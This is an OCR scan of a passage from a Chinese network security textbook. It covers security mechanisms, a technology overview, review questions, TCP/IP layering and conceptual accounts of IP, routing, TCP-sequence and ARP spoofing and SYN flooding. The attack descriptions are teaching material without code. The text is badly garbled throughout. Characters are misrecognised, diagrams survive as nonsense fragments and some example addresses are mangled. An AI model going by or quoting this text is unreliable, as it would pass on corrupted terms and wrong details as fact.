系统 报告 ,审计 系统 发 出 报警 并 形成 部 分 追踪 审计 日 志 。 

访问 控制 可 分 为 自主 访问 控制 和 强制 访问 控制 两 大 类 。 自 主 访问 控制 ,是 指 由 用 户 对 
自身 所 创建 的 访问 对 象 (文件 ,数据 表 等 ) 进 行 访问 ,并 可 将 对 这 些 对 象 的 访问 权 授予 其 他 用 
户 和 从 授予 权限 的 用 户 收回 其 访问 权限 ; 强制 访问 控制 ,是 指 由 系统 (通过 专门 设置 的 系统 
安全 员 ) 对 用 户 所 创建 的 对 象 进行 统一 的 强制 性 控制 ,按照 规定 的 规则 决定 哪些 用 户 可 以 对 
哪些 对 象 进行 什么 样 操作 系统 类 型 的 访问 ,即使 是 创建 者 用 户 , 在 创建 一 个 对 象 后 ,也 可 能 
无 权 访问 该 对 象 。 


3. 数据 完整 性 机 制 


数据 完整 性 有 两 个 方面 : 数据 单元 的 完整 性 和 数据 单元 序列 的 完整 性 。 

数据 单元 的 完整 性 是 指 组 成 一 个 单元 的 一 段 数据 不 被 破坏 或 自 改 。 保 证 单元 数据 完整 
性 的 一 般 做 法 是 发 送 方 在 有 数据 签名 的 文件 上 用 哈 希 函数 产生 一 个 标记 ,接收 方 在 收 到 文 
件 后 ,也 用 相同 的 哈 希 函数 进行 处 理 。 如 果 接 收 方 与 发 送 方 生成 的 标记 相同 ,就 可 以 确定 在 
传输 过 程 中 数据 没有 被 修改 过 , 即 数据 的 完整 性 得 以 保持 。 

数据 单元 序列 的 完整 性 是 指 发 送 方 在 发 送 数据 前 ,应 将 数据 分 割 为 按 序列 号 编排 的 许 
多 数据 单元 , 待 数据 传输 到 接收 方 时 还 能 按照 原 有 的 序列 ,保持 序列 号 的 连续 性 和 时 间 标 记 
的 正确 性 。 这 样 ,就 可 以 防止 丢失 、 重 复 、 乱 序 或 假冒 数据 单元 等 情况 发 生 。 


4. 数字 签名 机 制 


数据 签名 机 制 是 对 加 密 机 制 和 数据 完整 性 机 制 的 重要 补充 ,也 是 解决 网 络 通 信安 全 问 
题 的 有 效 方法 。 数 字 签 名 机 制 可 解决 下 列 问题 。@ 和 否认 。 发 送 方 事后 否认 自己 曾 发 送 过 某 
文件 ,接收 方 否认 自己 曾 接 收 过 某 文件 。@ 伪 造 。 接 收 方 伪造 一 份 文件 ,声称 文件 来 自发 送 
方 。@ 冒 充 。 网 上 某 个 用 户 冒 充 别 人 的 身份 收发 信息 。@ 算 改 。 接 收 方 私 自 更 改 发 送 方 发 
出 的 信息 内 容 。 

数据 签名 机 制 保证 数据 来 源 的 真实 性 ,通信 实体 的 真实 性 、 抗 否认 人 性、 数据 完整 性 和 不 
可 重用 性 。 


5. 鉴别 交换 机 制 


鉴别 交换 机 制 是 通过 互相 交换 信息 的 方式 来 确认 彼此 的 身份 。 鉴 别 交换 技术 有 多 种 ， 
常见 方法 有 3 类。 口令 鉴 别 。 发 送 方 提供 口令 以 证 明 自 己 的 身份 ,接收 方 根据 口令 以 检 
测 对 方 的 身份 。@ 数 据 加 密 鉴别 。 将 交换 的 数据 加 密 后 进行 传送 ,只 有 合法 用 户 才能 通过 
自己 掌握 的 密 钥 解 密 , 得 出 明文 并 确认 发 送 方 是 掌握 另 一 个 密 钥 的 人 。 通 常 ,数据 加 密 与 握 
手 协议 ,数字 签名 和 PKI 等 结合 使 用 ,使 得 身份 鉴别 更 加 可 靠 。@ 实 物 属性 鉴别 。 利 用 通 
信 双 方 的 固有 特征 或 所 拥有 的 实物 属性 进行 身份 鉴别 。 例 如 指纹 、 声 谱 识 别 、 身 份 卡 识别 。 


6. 通信 业务 填充 机 制 


通信 业务 填充 机 制 主要 用 于 对 付 窃 听 者 的 流量 分 析 。 攻 击 者 常常 通过 网 络 中 某 一 路 径 
的 信息 流 和 流向 的 变化 来 判断 将 会 发 生 的 某 些 事件 ,或 从 中 提取 军事 ,商业 敏感 信息 。 为 了 
对 付 这 种 攻击 ,在 某 些 站 点 间 持 续 地 传送 一 些 伪 随 机 数据 ,使 攻击 者 不 知道 哪些 数据 是 有 用 
的 ,哪些 数据 是 无 用 的 ,从 而 挫败 攻击 者 的 信息 流 分 析 。 

通信 业务 填充 机 制 包 括 掩盖 通信 的 频 度 、 报 文 的 长 度 、 报 文 的 格式 和 报 文 的 地 址 。 为 了 
掩盖 报 文 地 址 ,一般 采用 物理 层 的 链 路 加 密 方式 ,而 伪 报 文 的 发 送 可 在 网 络 层 协议 中 实现 。 


7. 路 由 控制 机 制 


因特网 中 的 通信 ,路 由 控制 机 制 可 以 使 信息 的 发 送 方 选择 特殊 的 路 由 ,以 保证 数据 安 
全 。 路 由 控制 机 制 实际 上 就 是 控制 信息 的 流向 。 这 种 控制 ,由 用 户 提出 申请 ,在 自己 的 程序 
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中 设计 安全 路 由 标志 ; 也 可 以 由 网 络 安全 路 由 控制 机 构 在 检测 出 不 安全 路 由 后 ,通过 动态 
调整 路 由 表 , 选 择 安全 的 路 径 。 


8. 公证 机 制 


公证 机 制 的 设立 是 为 了 解决 通信 双方 由 于 诚信 问题 产生 的 纠纷 ,同时 也 可 以 解决 由 于 
设备 故障 等 技术 原因 造成 信息 丢失 、 破 坏 或 延迟 等 有 关 责任 问题 。 通 常 , 要 有 一 个 各 方 都 信 
任 的 仲裁 机 构 , 以 确保 双方 的 争执 获得 公平 的 解决 。 

为 使 公证 机 构 得 到 必要 的 信息 ,通信 各 方 的 信息 交换 都 必须 由 公证 机 构 进行 中 转 。 显 
然 公证 机 构 本 身 的 安全 可 靠 性 和 诚实 可 信和 度 又 必须 在 严格 的 控制 之 中 。 


(3 网 络 安全 关键 技术 


下 面 介 绍 关于 网 络 安全 的 关键 技术 。 


1. 协议 分 析 

TCP/IP 是 Internet 通信 的 基础 ,但 其 存在 安全 缺陷 ,如 ARP 欺骗 ,IP 欺骗 ,路 由 选择 
欺骗 \TCP 序列 号 欺骗 \TCP 序列 号 洪 泛 攻击 等 。 有 必要 对 其 工作 机 制 进行 分 析 ,找到 黑客 
攻击 网 络 的 陷 门 ,以 便 设 计 具 有 安全 机 制 的 协议 栈 。 具 体内 容 见 第 2 童 。 


2. 黑客 攻击 技术 


利用 技术 漏洞 对 系统 或 网 络 进行 攻击 是 网 络 安全 的 主要 威胁 ,必须 熟悉 网 络 攻击 流程 ， 
掌握 黑客 的 攻击 方法 ,披露 攻击 技术 的 真相 ,实施 抗 攻 击 策 略 , 做 到 * 知 彼 知已 , 百 战 不 列 ”。 
具体 内 容 见 第 3 章 。 


3. PKI 技术 


PKI 是 基于 公 钥 技术 实施 的 ,支持 公 钥 管理 并 提供 真实 性 、 保 密 性 完整 性 安全 服务 的 
具有 普 适 性 的 安全 基础 设施 ; 其 目标 就 是 要 充分 利用 公 钥 密码 学 的 理论 基础 ,建立 起 一 种 
普遍 适用 的 基础 设施 ,为 各 种 网 络 应 用 提供 全 面 的 安全 服务 。 具 体内 容 见 第 4 章 。 


4. 操作 系统 安全 


操作 系统 安全 是 计算 机 系统 安全 的 基石 ,没有 操作 系统 的 安全 就 谈 不 上 主机 系统 、 网 络 
系统 和 数据 库 系统 的 安全 ,其 安全 功能 包括 内 存 保护 ,文件 保护 、 身 份 认证 、 存 取 控 制 等 。 具 
体内 容 见 第 5 H. 


5. 应 用 服务 安全 


Internet 应 用 服务 是 为 用 户 提供 信息 共享 与 交换 的 平台 ,WWW 服务 器 经 常 被 恶意 算 
改 主页 , 植 人 木马 ,FTP 服务 器 泄漏 机 密 文件 或 被 上 传 垃圾 文件 ,E-mail 服务 器 传播 病毒 ， 
大 多 是 由 于 配置 不 当 造成 的 。 具 体内 容 见 第 6 章 。 


6. 防火 墙 技术 


防火 墙 是 一 种 计算 机 硬件 和 软件 结合 的 访问 控制 产品 ,在 内 部 网 络 与 Internet 之 间 建 
立 起 一 个 安全 网 关 (security gateway), 有 效 阻止 黑客 利用 不 安全 的 服务 对 内 部 网 络 的 攻 
击 , 防 止 内 部 对 外 部 的 非法 访问 。 具 体内 容 见 第 7 章 。 


7. VPN 技术 


虚拟 专用 网 (VPN) 是 在 公共 数据 网 络 上 ,通过 采用 数据 加 密 技术 和 访问 控制 技术 , 实 
现 两 个 或 多 个 可 信 内 部 网 之 间 的 互联 。VPN 的 构筑 通常 要 求 采 用 具有 加 密 功 能 的 路 由 器 
或 防火 墙 ,以 实现 数据 在 公共 信道 上 的 可 信 传 递 。 具体 内 容 见 第 8 章 。 


8. 入 侵 检 测 系统 


我 们 做 一 个 形象 的 比喻 : 假如 防火 墙 是 一 幢 大 楼 的 门卫 ,那么 人 侵 检 测 系统 (IDS) 就 是 
这 幢 大 楼 中 的 监控 系统 。 和 人 侵 检 测 系统 是 一 种 对 网 络 传输 进行 实时 监视 ,在 发 现 可 疑 传 输 
时 发 出 警报 或 者 采取 主动 反应 措施 的 网 络 安 全 设备 。 入 侵 防御 系统 (简称 IPS) 是 对 防 病毒 
软件 和 防火 墙 的 补充 ,是 一 种 能 够 监视 网 络 或 网 络 设备 的 网 络 资料 传输 行为 的 计算 机 网 络 
硬件 ,能够 即时 地 中 断 、 调 整 或 隔离 一 些 不 正常 或 是 具有 伤害 性 的 网 络 资料 传输 行为 。 具 体 
内 容 见 第 9 章 。 

网 络 安全 是 一 门 涉及 通信 工程 .计算 机 网 络 .密码 学 数学、 物理 学 ,法 学 和 管理 学 等 领 
域 的 综合 性 技术 。 网 络 安全 的 实现 不 仅 要 靠 先进 的 技术 ,而 且 要 靠 严 格 的 管理 制度 .严肃 的 
法 律 制约 和 普及 的 安全 教育 。 


EE 


. 什么 是 计算 机 网 络 ? 

. 通信 安全 的 目的 是 什么 ? 

. 计算 机 安全 的 目的 是 什么 ? 

. 网络 安全 的 目的 是 什么 ? 

.如 何 理解 网 络 安 全 ? 

. 如何 理 解 网 络 攻击 ? 

. 网络 安 全 机 制 常见 的 有 哪儿 种 ? 

. 为 什么 说 加 密 机 制 是 网 络 安全 的 核心 技术 ? 
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本 章 介绍 TCP/IP 协议 族 .工作 原理 ,Internet 安全 缺陷 和 TCP/IP 安全 机 制 ,重点 介绍 
IP 安全 机 制 .TCP 安全 机 制 ,以 及 如 何 利用 网 络 工具 捕获 和 分 析 数 据 包 。 


B TCP/IP 概述 


TCP/IP 是 一 个 四 层 协议 系统 ,TCP/IP 协议 族 是 一 组 不 同 的 协议 组 合 在 一 起 构成 的 协 

议 族 ,如 表 2-1 所 示 ,每 一 层 负 责 不 同 的 功能 。 
表 2-1 TCP/IP 协议 族 
主要 功能 

负责 把 数据 传输 到 传输 层 或 者 接收 从 传输 层 返 回 的 数据 
为 两 台 主 机 上 的 应 用 程序 提供 端 到 端的 通信 、TCP 为 两 台 
主机 提供 高 可 靠 性 的 数据 通信 , 它 所 做 的 工作 包括 把 应 用 
程序 交 给 它 的 数据 分 成 大 小 合适 的 数据 块 交 给 下 面 的 网 络 
层 ,确认 接收 到 的 分 组 等 。UDP 则 为 应 用 层 提 供 不 可 靠 的 
数据 通信 , 它 只 是 把 数据 包 的 分 组 从 一 台 主 机 发 送 到 另 一 
台 主 机 ,但 是 不 保证 该 数据 能 到 达 另 一 端 
主要 为 数据 包 选 择 路 由 ,其 中 IP 是 TCP/IP 协议 族 中 最 为 
核心 的 协议 ,所 有 的 TCP, UDP, ICMP, IGMP 数据 都 以 IP 
数据 包 格式 传输 
发 送 时 将 瑟 包 作为 帧 发 送 ,接收 时 把 收 到 的 位 组 装 成 帧 ， 
同时 提供 链 路 管理 、 错 误 检测 等 


TCP/IP 主要 协议 
应 用 层 | Http Telnet, FTP, E-mail 等 


传输 层 | TCP .UDP 


网 络 层 | ICMP IP IGMP 


ARP, RARP 和 设备 驱动 程序 


RAP | 基本 


TCP/IP 协议 族 中 TCP 和 IP 只 是 其 中 的 两 种 协议 ,其 中 TCP 和 UDP 是 两 种 最 为 著 
名 的 传输 层 协 议 ,IP 是 网 络 层 协议 。IP 和 TCP 这 两 个 协议 的 功能 不 尽 相 同 , 它 们 是 在 同一 
时 期 作为 一 个 协议 来 设计 的 ,并 且 在 功能 上 也 是 互补 的 ,虽然 它们 可 以 分 开 单独 使 用 ,但 是 
只 有 两 者 结合 ,才能 保证 Internet 在 复杂 的 环境 下 正常 运行 。 要 连接 到 Internet 的 计算 机 ， 
都 必须 同时 安装 和 使 用 这 两 个 协议 ,因此 在 实际 中 常 把 这 两 个 协议 统称 做 TCP/IP 协议 。 

TCP/IP 协议 族 中 各 层 的 关系 如 图 2-1 所 示 。 

因特网 控制 消息 协议 (Internet Control Message Protocol,ICMP) 是 IP 的 附属 协议 。 
IP 层 用 它 来 与 其 他 主机 或 路 由 器 交换 错误 报 文 或 其 他 摘要 信息 。IGMP 是 Internet 组 管理 
协议 , 它 用 来 把 一 个 UDP 数据 包 多 播 到 多 个 主机 。 
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1 i 1 
1 
传输 介质 


图 2-1 TCP/IP 各 层 关 系 


ARP( 地 址 解析 协议 ) 和 RARP( 逆 地 址 解析 协议 ) 是 某 些 网 络 接口 (如 以 太 网 ) 使 用 的 
特殊 协议 ,它们 用 来 转换 网 络 接口 的 物理 地 址 和 对 应 的 TP 地 址 。 

当 目 的 主机 收 到 一 个 以 太 网 数据 帧 时 ,数据 就 开始 从 协议 栈 的 底部 向 上 升 ,同时 去 掉 各 
层 协 议 封装 的 报 文 首部 。 每 层 协议 盒 都 要 去 检查 报 文 首部 中 的 标识 协议 , 以 确定 接收 数据 
的 上 层 协议 。 这 个 过 程 称 做 分 用 (demult IP lexing) ,如 图 2-2 所 示 。 


[应 用 程序 ]-…[ 应 用 程序 ] | 应 用 程序 | … [ 应 用 程序 
根据 TCP 或 UDP 
二 


TCP UDP | “进行 分 用 
[icme || ive Jean 
协议 值 进 行 分 用 
IP 
ARP RARP 
ee] jecit 
的 帧 类 型 进行 分 用 
以 太 网 
驱动 程序 
i 
进入 的 帧 


图 2-2 TCP/IP 分 用 


图 2-1 和 图 2-2 中 的 协议 分 层 并 不 是 绝对 的 , 拿 ICMP 和 IGMP 来 说 ,在 图 2-1 中 ,把 它 
与 IP 放 在 同一 层 上 , 那 是 因为 事实 上 它们 是 IP 的 附属 协议 。 但 是 在 图 2-2 中 ,又 把 它们 放 
在 IP 层 的 上 面 ,这 是 因为 ICMP 和 IGMP 报 文 都 封装 在 IP 数据 包 中 。 

再 比如 ARP 和 RARP, 在 图 2-1 中 ,把 ARP 作为 以 太 网 设备 驱动 程序 的 一 部 分 , 放 在 
IP 层 的 下 面 。 在 图 2-2 中 ,把 它们 放 在 以 太 网 设备 驱动 程序 的 上 面 ,这 是 因为 它们 和 IP 数 
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据 包 一 样 ,都 有 各 自 的 以 太 网 数据 帧 类 型 。 
这 里 用 两 种 图 只 想 说 明 各 种 协议 之 间 彼 此 的 关系 ,它们 之 间 并 不 是 彼此 孤立 的 。 


2.1.1 IP E 


fe TCP/IP 协议 族 中 ,网 络 层 IP 提供 的 是 一 种 不 可 靠 的 服务 , 它 只 是 尽 可 能 地 把 数据 
从 源 点 送 到 目的 节点 ,并 不 提供 任何 可 靠 性 保证 。 在 通信 中 ,IP 层 只 负责 数据 的 路 由 与 传 
输 ,并 不 处 理 数据 包 的 内 容 。 例 如 ICMP, TCP 或 UDP, 这 些 协议 是 依赖 IP. 层 的 传输 功能 
来 传送 数据 的 。 在 通信 双方 的 主机 中 , 收 到 这 些 协 议 的 数据 包 后 ,一 般 在 通信 的 对 应 主机 
上 ,会 有 程序 来 处 理 这 些 数据 。 


2.1.2 TCP 层 


TCP 层 位 于 IP 层 的 上 层 ,应 用 程序 在 TP. 网 络 上 相互 之 间 传输 的 标准 传输 协议 有 两 
个 ;一 个 是 传输 控制 协议 (TCP) ,TCP 是 目前 Internet 上 使 用 的 最 重要 的 协议 , 它 提供 的 是 
可 靠 的 、 可 控制 的 传输 服务 ,大 部 分 Internet 应 用 程序 都 是 用 TCP, 因 为 它 嵌入 可 靠 性 和 流 
控制 服务 可 确保 数据 不 会 丢失 和 被 破坏 ; 另 一 个 是 用 户 数 据 报 协 议 (UDP) , 它 提供 的 服务 
轻便 但 不 可 靠 。 

IP 层 提供 了 一 种 不 可 靠 的 服务 ,TCP 在 不 可 靠 的 IP 层 上 提供 了 可 靠 的 传输 层 , TCP 
采用 了 超时 重 发 ,发 送 和 接收 端 到 端的 数据 确认 机 制 来 保证 这 种 服务 的 可 靠 性 。 由 此 可 见 ， 
传输 层 和 网 络 层 分 别 负责 不 同 的 功能 。 


2 TCP/IP 工作 原理 


下 面 以 图 2-3 中 的 主机 A( 信 源 ) 和 主机 B( 信 宿 ) 之 间 通 信 为 例 ,说 明 TCP/IP 的 工作 原 
理 。 图 中 的 逻辑 传输 线路 表明 了 数据 传输 的 方向 ,以 及 信 源 和 信 宿 ,实际 传输 线路 表明 了 数 
据 的 真实 传输 链 路 。 


主机 A 主轴 B 
应 用 层 “| -相同 的 报 文 - HE 
运输 层 | -Ama [a 

天 一 路 由 器 R T 
ERE) ga mR | quu, [MR 
1 meg cl — bL sms 3 

E 
BEDR] ca, EER] gann E 
E 物理 网 络 1 z c 物理 网 络 2 2a 
图 2.3 主机 A 和 主机 B 的 数据 通信 模型 


数据 从 信 源 传输 到 信 宿 的 过 程 可 描述 如 下 。 
(1) 在 信 源 上 ,应 用 层 程序 将 需 传 输 数 据 流传 送 给 信 源 上 的 传输 层 。 
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(2) 信 源 上 的 传输 层 将 应 用 层 的 数据 流 截 成 若干 分 组 ,并 加 上 TCP 首部 形成 TCP Bt. 
递交 信 源 上 的 网 络 层 。 

(3) 信 源 的 网 络 层 给 TCP 报 文 段 封装 上 包括 源 、 目 的 主机 IP 地 址 的 IP 首部 ,生成 一 
个 全数 据 报 , 并 将 IP. 数据 报 递交 给 信 源 的 链 路 层 。 

(4) 信 源 的 链 路 层 在 其 MAC 帧 的 数据 部 分 装 上 IP 数据 报 , 再 封装 上 包括 源 、 目 的 主机 
的 MAC 地 址 的 MAC 帧 头 和 帧 尾 , 并 根据 其 目的 MAC 地 址 ,将 MAC 帧 发 往 信 宿 或 中 间 
路 由 器 ,如 路 由 器 R。 

(5) 路 由 器 是 一 个 具有 多 个 接口 的 网 络 互 连 设备 ,可 以 把 IP 数据 报 从 一 个 网 络 转发 到 
另 一 个 网 络 , 如 图 2-3 中 的 路 由 器 R。 当 IP 数据 报 传输 到 路 由 器 后 ,路 由 器 将 根据 IP 地 址 
数据 报 中 的 目的 地 址 进行 传输 路 径 的 选择 ,并 根据 所 选择 的 传输 路 径 进 行 TP 数据 报 的 转 
发 。 通 常 ,路 由 器 只 处 理 链 路 层 和 网 络 层 的 数据 。 在 本 例 中 ,路 由 器 R 接受 主机 A 发 送 过 
来 的 TP 数据 报 , 并 将 该 数据 报 发 送 给 主机 B. 

(6) 当 数据 传输 到 信 宿 , 链 路 层 将 MAC 帧 的 帧 头 和 帧 尾 去 掉 , 并 将 TP 数据 报 送 交 信 宿 
的 网 络 层 。 

(7) 信 宿 网 络 层 检 查 IP 数据 报 首部 , 若 首部 中 校 验 和 与 计算 结果 不 一 致 , 则 丢弃 该 卫 
数据 报 ; 若 校 验 和 与 计算 结果 一 致 , 则 去 掉 IP 首部 ,将 TCP 报 文 段 送 交 信 宿 传 输 层 。 

(8) 信 宿 传输 层 检查 TCP 报 文 段 的 顺序 号 ,判断 是 否 正确 的 TCP 报 文 段 ,然后 检查 
TCP 首部 。 若 正确 , 则 向 信 源 发 确认 消息 ; 若 不 正确 或 丢 包 , 则 向 信 源 要 求 重 发 信息 。 

(9) 信和 宿 传输 层 去 掉 TCP 首部 ,将 排 好 顺序 的 分 组 组 成 应 用 数据 流 送 给 信 宿 上 相应 的 
应 用 程序 。 这 样 信 宿 接收 来 自信 源 的 字 节 流 , 就 像 直 接 接收 来 自信 源 的 字 节 流 一 样 。 


&3 Internet 的 安全 缺陷 


Internet 是 基于 TCP/IP 的 计算 机 网 络 。 尽 管 TCP/IP 技术 获得 了 巨大 成 功 ,但 它 在 设 
计 之 初 却 没 考虑 安全 问题 。 因 此 , 它 可 以 被 有 经 验 的 黑客 入 侵 和 利用 ,以 达到 删除 ,修改 、 究 
取 和 泄露 机 密 或 敏感 信息 的 目的 。TCP/IP 的 安全 缺陷 主要 表现 在 IP 欺骗 路 由 选择 欺 
Ji TCP 序列 号 欺骗 ,TCP 序列 号 洪 泛 攻 击 、ARP 欺骗 等 方面 。 


2.3.1 IP IA 


TCP/IP 是 利用 IP 地址 作为 网 络 节点 的 唯一 标识 ,但 是 节点 的 IP 地址 不 是 固定 的 ,是 
可 以 改变 的 ,这 就 留 下 严重 的 缺陷 。 当 入 侵 者 冒充 某 个 可 信和 节点 的 IP 地 址 进行 攻击 时 ,被 
攻击 者 很 难以 IP 地 址 进行 有 效 的 身份 验证 (Authentication ) 。 
fg UNIX 系统 中 ,非法 用 户 利用 TCP/IP 将 其 计算 机 连接 到 UNIX 主机 上 ,将 UNIX 
服务 器 当做 服务 器 ,使 用 网 络 文件 系统 (NFS) 访 问 主机 的 目录 和 文件 。 因 为 NFS 只 使 用 IP 
地 址 对 用 户 进行 身份 验证 ,因此 ,非法 用 户 可 用 同样 的 名 字 和 IP 地 址 欺骗 服务 器 。 虽 然 服 
务 器 上 的 软件 平台 提供 用 户 名 和 口令 等 控制 机 制 ,但 是 由 于 口令 以 明文 的 形式 传输 ,无 法 抵 
御 重 传 和 窃听 ,攻击 者 很 容易 运行 口令 破译 程序 窃 得 口令 ,对 系统 发 起 攻击 。 
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2.3.2 路 由 选择 欺骗 


在 TCP/IP 中 ,IP 数据 包 中 有 一 个 源 路 由 选择 选项 ,该 选项 可 以 直接 指明 到 达 节 点 的 
路 由 。 攻 击 者 冒充 某 个 服务 器 的 可 信和 节点 的 IP 地 址 ,构造 通 往 该 服务 器 的 往返 路 由 。 当 攻 
击 者 将 可 信 节 点 作为 通 往 服务 器 路 由 中 的 最 后 一 站 时 就 可 向 服务 器 发 出 请 求 ,并 进行 攻击 。 

另外 ,TCP/IP 对 各 节点 收 到 的 信息 的 真实 性 不 作 检 查 , 这 又 给 攻击 者 提供 可 乘 之 机 。 
当 攻击 者 利用 距离 矢量 路 由 选择 算法 (RIP) 发 布 虚假 的 路 由 信息 时 ,服务 器 会 毫 无 察觉 。 
攻击 者 利用 ICMP 的 复位 功能 ,将 正常 的 路 由 器 定义 为 失效 的 路 由 器 ,从 而 达到 改变 路 由 非 
法 存 取 的 目的 。 


2.3.3 TCP 序 列 号 欺骗 


TCP 是 一 个 面向 连接 的 、 可 靠 的 传输 层 协议 。 在 主机 C 和 服务 器 S 之 间 , 建 立 TCP 连 
接 需要 经 过 三 次 握手 。 首 先 ,主机 选择 一 个 初始 序列 号 ISNc (Tnitial Sequence Number. 
ISN) ,并 设置 标志 位 SYN=1, 传 输 给 服务 器 要 求 建 立 连接 ; 服务 器 收 到 传输 后 给 予 确认 ， 
发 送 它 的 序列 号 ISNs 和 标志 位 ACK, 同 时 ,期 待 获得 主机 的 下 一 个 序列 号 ISNc 十 1; 主机 
再 次 确认 ISNs 十 1 后 ,就 可 开始 传输 数据 。TCP 的 三 次 握手 建立 连接 的 过 程 如 图 2-4 所 示 。 


HH SYN(SEQs=ISNO) [| 
十 服 
HLH SYN(SEQs=ISNs), ACK(SEQA=ISNc+1) ^ 
s 

| ACK(SEQA=ISNs+1) ma 


图 2-4 TCP 三 次 握手 过 程 


在 TCP 连接 中 ,每 一 字 节 的 数据 都 有 唯一 的 序列 号 与 之 对 应 。 数 据 报 文 的 序列 号 是 本 
报 文 所 带 第 一 字 节 数据 的 序列 号 ,而 用 于 建立 连接 的 SYN 报 文 的 序列 号 则 作为 初始 序列 
号 ISN。 所 有 要 传送 数据 的 开始 序列 号 为 ISN 十 1。 通 信 双 方 对 所 收 到 的 报 文 的 每 一 项 检 
查 就 是 看 序列 号 是 否 在 可 接收 的 范围 内 。 若 检查 未 通过 ,此 报 文 将 被 丢弃 。 显 然 ,攻击 者 要 
冒充 主机 C 与 服务 器 S 建立 连接 ,就 一 定 要 知道 服务 器 S 所 使 用 的 序列 号 。 如 果 攻 击 者 想 
在 C 与 S 的 连接 建立 之 后 以 C 的 身份 发 送 攻击 报 文 ,还 应 知道 C 所 使 用 的 有 效 序列 号 。 由 
于 利用 截获 报 文 的 手段 获取 序列 号 是 非常 困难 的 ,所 以 攻击 者 常 参与 连接 建立 的 全 过 程 。 
因为 伪装 报 文 的 序列 号 由 攻击 方 确定 ,在 连接 建立 后 的 通信 过 程 中 ,很 容易 使 假 报 文通 过 服 
务 器 一 方 的 检查 。 下 面 用 图 2-5 说 明 攻 击 方 如 何 冒 充 主机 C 向 服务 器 S 发 起 连接 的 过 程 。 


攻击 者 | G SYN(SEQ;-ISNG), SRC-C r-- 
[4 

主机 | C H SYN(SEQ;-ISN;). ACK(SEQ4-ISNG*) A 
S 

攻击 者 | G [| ACK(SEQa=ISNs+1), SRC=C kat 


图 2-5 攻击 者 G 冒 充 C 与 S 建 立 连接 
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图 中 SRC 一 C 表明 ,攻击 者 只 有 冒充 服务 器 所 信任 的 主机 C 才能 与 S 建立 连接 。 在 建 
立 连接 后 ,服务 器 S 还 以 为 它 正 与 主机 C 通信 。 待 真正 的 主机 C 收 到 S 发 给 它 的 数据 包 
SYN/ACK 后 ,C 却 认 为 它 是 一 个 非法 数据 包 , 请 求 终止 连接 RST, 这 时 ,攻击 者 的 目的 才 
会 落空 。 为 了 使 攻击 时 间 延 长 ,攻击 者 就 必须 使 主机 C 丧失 工作 能 力 。 


2.3.4 TCP 序 列 号 洪 泛 攻 击 


由 于 攻击 者 担心 自己 的 行为 被 揭穿 , 它 就 必须 向 主机 C 的 TCP 端口 发 送 大 量 SYN 请 
求 ,这 些 请 求 的 源 地 址 是 合法 的 但 是 虚假 的 IP 地 址 。 比 如 某 些 具有 合法 IP 地 址 的 主机 还 
未 开机 。 受 攻击 的 主机 C 会 向 该 IP 地 址 发 送 响应 信息 ,但 得 不 到 确认 。 与 此 同时 ,主机 C 
发 出 的 TP 包 不 能 送 达 ,因此 网 络 会 通知 该 主机 的 目标 不 可 到 达 。 该 主机 C 却 认为 它 是 暂 
时 的 故障 ,继续 重 试 直到 超时 次 数 到 达 为 止 。 当 然 ,该 主机 C 对 过 程 的 处 理 需 要 大 量 的 时 
间 , 不 过 都 是 徒劳 无 功 的 。 应 当 指 出 的 是 ,TCP 处 理 模块 有 一 个 处 理 并 行 SYN 请 求 的 最 上 
限 , 它 可 以 看 做 一 台 主机 能 同时 处 理 的 连接 数目 。 这 些 连 接 包括 那些 正在 进行 三 次 握手 而 
没有 最 终 完成 的 连接 ,也 包括 那些 已 成 功 完成 握手 但 还 没有 被 应 用 程序 所 调用 的 连接 。 每 
一 个 连接 都 要 分 配 一 块 内 存 , 这 样 ,该 主机 C 将 很 快 用 完 它 的 内 存 资源 ,而 拒绝 别 的 请 求 。 
这 就 是 TCP 序列 号 艇 炸 攻 击 的 最 终结 果 。 由 此 可 见 ,TCP/IP 是 非常 不 安全 的 。 

多 数 因特网 的 服务 器 上 , 至少 包括 下 列 这 些 协 议 : 传输 控制 协议 (TCP)、 网 际 协议 
CP) ,网 际 控制 报 文 协议 (ICMP)、 地 址 解析 协议 (ARP) ,文件 传输 协议 (FTP) ,远程 登录 协 
议 (Telnet) ,简单 邮件 传输 协议 (SMTP)、 超 文本 传输 协议 (HTTP) 等 。 

这 些 协议 仅仅 是 因特网 的 一 小 部 分 协议 。 实 际 上 因特网 有 数 百 个 协议 ,半数 以 上 的 主 
要 协议 都 有 一 个 或 更 多 的 安全 漏洞 。 


2.3.5 ARP 欺骗 


ARP 用 于 IP 地 址 到 MAC 地 址 的 转换 ,该 地 址 的 映像 关系 存储 在 ARP 缓存 表 中 。 如 
果 黑 客 攻 击 ARP 缓存 表 , 它 将 导致 发 送 给 正确 主机 的 数据 包 , 由 攻击 者 转发 给 由 它 控 制 的 
另外 的 目标 主机 。 

一 般 情况 下 ,对 于 使 用 集线器 的 局 域 网 环境 ,攻击 者 只 需 把 网 卡 设置 为 混杂 模式 即 可 。 
而 对 于 使 用 交换 机 的 局 域 网 ,攻击 者 会 试探 交换 机 是 否 存 在 失败 保护 模式 (Fail-Safe 
Mode) 。 由 于 交换 机 维护 IP 地 址 和 MAC 地 址 的 映像 关系 需要 花费 一 定 的 处 理 时 间 , 当 网 络 
通信 出 现 大 量 虚假 MAC 地 址 时 , 某 些 类 型 的 交换 机 会 出 现 过 载 情况 ,从 而 转换 到 失败 保护 模 
式 , 其 工作 方式 和 集线器 相同 。 如 果 交 换 机 不 存在 失败 保护 模式 , 则 需 使 用 ARP 欺骗 。 

ARP 欺骗 需要 攻击 者 主机 具有 TP 数据 包 的 转发 能 力 ,并 拥有 两 块 网 卡 ,假设 IP 地 址 
分 别 是 192. 168. 0. 5 和 192. 168. 0. 6, 插 入 交换 机 的 两 个 端口 , 它 准 备 截获 目标 主机 
192.16.0.3 和 网 关 192. 168. 0. 2 之 间 的 通信 ,如 图 2-6 所 示 。 
正常 情况 下 ,假定 主机 A(192.168. 0.4) 想 要 通过 网 关 (192. 168. 0. 2) 访 问 因特网 。 它 
以 广播 方式 发 送 ARP 请 求 ,要求 获得 网 关 的 MAC 地 址 。 交 换 机 收 到 ARP 请 求 ,并 将 请 求 
包 转 发 给 各 个 主机 。 同 时 ,交换 机 将 更 新 MAC 地 址 和 端口 之 间 的 映射 表 , 主 机 A 将 绑 定 它 
所 连接 的 端口 。 网 关 收 到 ARP 请 求 后 ,发 出 带 有 网 关 的 MAC 地 址 的 ARP 响应 。 网 关 更 
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te 


路 由 器 192.168.0.1 
1 


192.168.0.5 


C =) 
192.168.0.4 192.168.0.3 
图 2-6 ARP 欺骗 攻击 


